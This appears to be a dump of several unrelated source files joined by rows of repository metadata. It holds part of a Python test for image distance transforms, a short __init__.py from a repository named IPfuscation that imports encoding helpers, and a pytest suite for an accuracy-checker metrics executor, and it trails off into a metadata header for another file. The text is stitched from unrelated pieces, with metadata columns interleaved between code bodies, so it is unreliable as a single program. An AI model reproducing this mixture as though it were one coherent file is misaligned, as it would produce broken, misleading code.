pw_img_dil = transform_utils.pixelwise_transform(
img, dilation_radius=2,
data_format='channels_last',
separate_edge_classes=True)
self.assertEqual(pw_img.shape[-1], 4)
self.assertEqual(pw_img_dil.shape[-1], 4)
assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] +
pw_img[..., 2], img > 0)))
self.assertGreater(
pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
pw_img[..., 0].sum() + pw_img[..., 1].sum())
def test_outer_distance_transform_2d(self):
for img in _generate_test_masks():
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 3
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 4
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
K.set_image_data_format('channels_first')
img = np.rollaxis(img, -1, 1)
bins = None
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 3
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 4
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
def test_outer_distance_transform_3d(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_outer_distance_transform_movie(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_inner_distance_transform_2d(self):
for img in _generate_test_masks():
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 3
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 4
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
K.set_image_data_format('channels_first')
img = np.rollaxis(img, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 3
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 4
distance = transform_utils.inner_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
def test_inner_distance_transform_3d(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_inner_distance_transform_movie(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.inner_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
if __name__ == '__main__':
test.main()
| 45.334081
| 80
| 0.547356
| 2,211
| 20,219
| 4.786522
| 0.103121
| 0.125295
| 0.074837
| 0.068034
| 0.850987
| 0.850515
| 0.846735
| 0.841066
| 0.841066
| 0.841066
| 0
| 0.021497
| 0.351204
| 20,219
| 445
| 81
| 45.435955
| 0.785257
| 0.065582
| 0
| 0.889213
| 0
| 0
| 0.01315
| 0
| 0
| 0
| 0
| 0
| 0.221574
| 1
| 0.029155
| false
| 0
| 0.023324
| 0
| 0.061224
| 0.002915
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fef452f581732dafe578a3766f822c6eee26e284
| 130
|
py
|
Python
|
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
src/mbinobs/__init__.py
|
ManuelMaM/IPfuscation
|
3d7ba78b2b152ae104e1c9ed1632c15aa02c35bb
|
[
"MIT"
] | null | null | null |
from mbinobs.ipv4 import _encode
from mbinobs.ipv6 import _encode
from mbinobs.mac import _encode
from mbinobs.uuid import _encode
| 32.5
| 32
| 0.853846
| 20
| 130
| 5.35
| 0.4
| 0.411215
| 0.448598
| 0.64486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017391
| 0.115385
| 130
| 4
| 33
| 32.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
feff6b461ccc4fbea5586ab40d4f88d90a93b00c
| 21,301
|
py
|
Python
|
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | 1
|
2019-10-19T23:43:48.000Z
|
2019-10-19T23:43:48.000Z
|
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | null | null | null |
demos/python_demos/accuracy_checker/tests/test_metric_evaluator.py
|
undeadinu/open_model_zoo
|
db4757112bfe3bd66ad4977fcfec08a55ef02d1f
|
[
"Apache-2.0"
] | 1
|
2019-10-19T23:43:52.000Z
|
2019-10-19T23:43:52.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
from accuracy_checker.config import ConfigError
from accuracy_checker.metrics import ClassificationAccuracy, MetricsExecutor
from accuracy_checker.representation import (ClassificationAnnotation, ClassificationPrediction, ContainerAnnotation,
ContainerPrediction, DetectionAnnotation, DetectionPrediction)
from tests.test_detection_metrics import DummyDataset
class TestMetric:
def setup_method(self):
self.module = 'accuracy_checker.metrics.metric_evaluator'
def test_missed_metrics_raises_config_error_exception(self):
config = {'annotation': 'custom'}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_missed_metrics_raises_config_error_exception_with_custom_name(self):
config = {'name': 'some_name', 'annotation': 'custom'}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_empty_metrics_raises_config_error_exception(self):
config = {'annotation': 'custom', 'metrics': []}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_metrics_with_empty_entry_raises_config_error_exception(self):
config = {'annotation': 'custom', 'metrics': [{}]}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_missed_metric_type_raises_config_error_exception(self):
config = {'annotation': 'custom', 'metrics': [{'undefined': ''}]}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_undefined_metric_type_raises_config_error_exception(self):
config = {'annotation': 'custom', 'metrics': [{'type': ''}]}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_accuracy_arguments(self):
config = {'annotation': 'custom', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
assert len(dispatcher._metrics) == 1
_, accuracy_metric, _, _, _ = dispatcher._metrics[0]
assert isinstance(accuracy_metric, ClassificationAccuracy)
assert accuracy_metric.top_k == 1
def test_accuracy_with_several_annotation_source_raises_config_error_exception(self):
config = {'annotation': 'custom',
'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'annotation1, annotation2'}]}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_accuracy_with_several_prediction_source_raises_value_error_exception(self):
config = {'annotation': 'custom',
'metrics': [{'type': 'accuracy', 'top_k': 1, 'prediction_source': 'prediction1, prediction2'}]}
with pytest.raises(ConfigError):
MetricsExecutor(config, None)
def test_accuracy_on_container_with_wrong_annotation_source_name_raise_config_error_exception(self):
annotations = [ContainerAnnotation({'annotation': ClassificationAnnotation('identifier', 3)})]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'a'}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_wrong_annotation_type_raise_config_error_exception(self):
annotations = [DetectionAnnotation('identifier', 3)]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [
{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_unsupported_annotations_in_container_raise_config_error_exception(self):
annotations = [ContainerAnnotation({'annotation': DetectionAnnotation('identifier', 3)})]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [
{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_unsupported_type_of_annotation_as_annotation_source_for_container_raise_config_error_exception(self):
annotations = [ContainerAnnotation({'annotation': DetectionAnnotation('identifier', 3)})]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [
{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'annotation'}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_on_annotation_container_with_several_suitable_representations_config_value_error_exception(self):
annotations = [ContainerAnnotation({'annotation1': ClassificationAnnotation('identifier', 3), 'annotation2': ClassificationAnnotation('identifier', 3)})]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_wrong_prediction_type_raise_config_error_exception(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_unsupported_prediction_in_container_raise_config_error_exception(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ContainerPrediction({'prediction': DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_with_unsupported_type_of_prediction_as_prediction_source_for_container_raise_config_error_exception(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ContainerPrediction({'prediction': DetectionPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
config = {'annotation': 'mocked', 'metrics': [
{'type': 'accuracy', 'top_k': 1, 'prediction_source': 'prediction'}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_accuracy_on_prediction_container_with_several_suitable_representations_raise_config_error_exception(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ContainerPrediction({'prediction1': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0]),
'prediction2': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
with pytest.raises(ConfigError):
dispatcher.update_metrics_on_batch(annotations, predictions)
def test_complete_accuracy(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
dispatcher.update_metrics_on_batch(annotations, predictions)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_complete_accuracy_with_container_default_sources(self):
annotations = [ContainerAnnotation({'a': ClassificationAnnotation('identifier', 3)})]
predictions = [ContainerPrediction({'p': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
dispatcher.update_metrics_on_batch(annotations, predictions)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_complete_accuracy_with_container_sources(self):
annotations = [ContainerAnnotation({'a': ClassificationAnnotation('identifier', 3)})]
predictions = [ContainerPrediction({'p': ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])})]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1, 'annotation_source': 'a', 'prediction_source': 'p'}]}
dispatcher = MetricsExecutor(config, None)
dispatcher.update_metrics_on_batch(annotations, predictions)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_zero_accuracy(self):
annotation = [ClassificationAnnotation('identifier', 2)]
prediction = [ClassificationPrediction('identifier', [1.0, 1.0, 1.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 1}]}
dispatcher = MetricsExecutor(config, None)
for _, evaluation_result in dispatcher.iterate_metrics([annotation], [prediction]):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == 0.0
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_complete_accuracy_top_3(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ClassificationPrediction('identifier', [1.0, 3.0, 4.0, 2.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3}]}
dispatcher = MetricsExecutor(config, None)
dispatcher.update_metrics_on_batch(annotations, predictions)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_zero_accuracy_top_3(self):
annotations =[ClassificationAnnotation('identifier', 3)]
predictions =[ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3}]}
dispatcher = MetricsExecutor(config, None)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == 0.0
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_reference_is_10_by_config(self):
annotations = [ClassificationAnnotation('identifier', 3)]
predictions = [ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3, 'reference': 10}]}
dispatcher = MetricsExecutor(config, None)
for _, evaluation_result in dispatcher.iterate_metrics(annotations, predictions):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == 0.0
assert evaluation_result.reference_value == 10
assert evaluation_result.threshold is None
def test_threshold_is_10_by_config(self):
annotations =[ClassificationAnnotation('identifier', 3)]
predictions = [ClassificationPrediction('identifier', [5.0, 3.0, 4.0, 1.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy', 'top_k': 3, 'threshold': 10}]}
dispatcher = MetricsExecutor(config, None)
for _, evaluation_result in dispatcher.iterate_metrics([annotations], [predictions]):
assert evaluation_result.name == 'accuracy'
assert evaluation_result.evaluated_value == 0.0
assert evaluation_result.reference_value is None
assert evaluation_result.threshold == 10
def test_classification_per_class_accuracy_fully_zero_prediction(self):
annotation = ClassificationAnnotation('identifier', 0)
prediction = ClassificationPrediction('identifier', [1.0, 2.0])
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
dataset = DummyDataset(label_map={0: '0', 1: '1'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch([annotation], [prediction])
for _, evaluation_result in dispatcher.iterate_metrics([annotation], [prediction]):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 2
assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[1] == pytest.approx(0.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_classification_per_class_accuracy_particually_zero_prediction(self):
annotation = [ClassificationAnnotation('identifier', 1)]
prediction = [ClassificationPrediction('identifier', [1.0, 2.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
dataset = DummyDataset(label_map={0: '0', 1: '1'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch(annotation, prediction)
for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 2
assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_classification_per_class_accuracy_complete_prediction(self):
annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 0)]
prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0]), ClassificationPrediction('identifier_2', [2.0, 1.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
dataset = DummyDataset(label_map={0: '0', 1: '1'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch(annotation, prediction)
for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 2
assert evaluation_result.evaluated_value[0] == pytest.approx(1.0)
assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_classification_per_class_accuracy_particual_prediction(self):
annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 0), ClassificationAnnotation('identifier_3', 0)]
prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0]), ClassificationPrediction('identifier_2', [2.0, 1.0]), ClassificationPrediction('identifier_3', [1.0, 5.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 1}]}
dataset = DummyDataset(label_map={0: '0', 1: '1'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch(annotation, prediction)
for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 2
assert evaluation_result.evaluated_value[0] == pytest.approx(0.5)
assert evaluation_result.evaluated_value[1] == pytest.approx(1.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_classification_per_class_accuracy_prediction_top3_zero(self):
annotation = [ClassificationAnnotation('identifier_1', 0), ClassificationAnnotation('identifier_2', 1)]
prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0, 3.0, 4.0]), ClassificationPrediction('identifier_2', [2.0, 1.0, 3.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 3}]}
dataset = DummyDataset(label_map={0: '0', 1: '1', 2: '2', 3: '3'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch(annotation, prediction)
for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 4
assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[1] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[2] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[3] == pytest.approx(0.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
def test_classification_per_class_accuracy_prediction_top3(self):
annotation = [ClassificationAnnotation('identifier_1', 1), ClassificationAnnotation('identifier_2', 1)]
prediction = [ClassificationPrediction('identifier_1', [1.0, 2.0, 3.0, 4.0]), ClassificationPrediction('identifier_2', [2.0, 1.0, 3.0, 4.0])]
config = {'annotation': 'mocked', 'metrics': [{'type': 'accuracy_per_class', 'top_k': 3}]}
dataset = DummyDataset(label_map={0: '0', 1: '1', 2: '2', 3: '3'})
dispatcher = MetricsExecutor(config, dataset)
dispatcher.update_metrics_on_batch(annotation, prediction)
for _, evaluation_result in dispatcher.iterate_metrics(annotation, prediction):
assert evaluation_result.name == 'accuracy_per_class'
assert len(evaluation_result.evaluated_value) == 4
assert evaluation_result.evaluated_value[0] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[1] == pytest.approx(0.5)
assert evaluation_result.evaluated_value[2] == pytest.approx(0.0)
assert evaluation_result.evaluated_value[3] == pytest.approx(0.0)
assert evaluation_result.reference_value is None
assert evaluation_result.threshold is None
| 56.954545
| 183
| 0.691611
| 2,261
| 21,301
| 6.270677
| 0.070765
| 0.097052
| 0.102412
| 0.063479
| 0.882494
| 0.866201
| 0.854563
| 0.851107
| 0.836225
| 0.823459
| 0
| 0.024032
| 0.191259
| 21,301
| 373
| 184
| 57.107239
| 0.798978
| 0.026384
| 0
| 0.703448
| 0
| 0
| 0.115873
| 0.001979
| 0
| 0
| 0
| 0
| 0.258621
| 1
| 0.113793
| false
| 0
| 0.017241
| 0
| 0.134483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a058d570582db619236f2283e727e570f20b2db
| 12,614
|
py
|
Python
|
parser/adder_Tests.py
|
musashin/DashBoardTest
|
50f1be6ab9a53b1864beea2756eca6c7f8d9b40f
|
[
"MIT"
] | null | null | null |
parser/adder_Tests.py
|
musashin/DashBoardTest
|
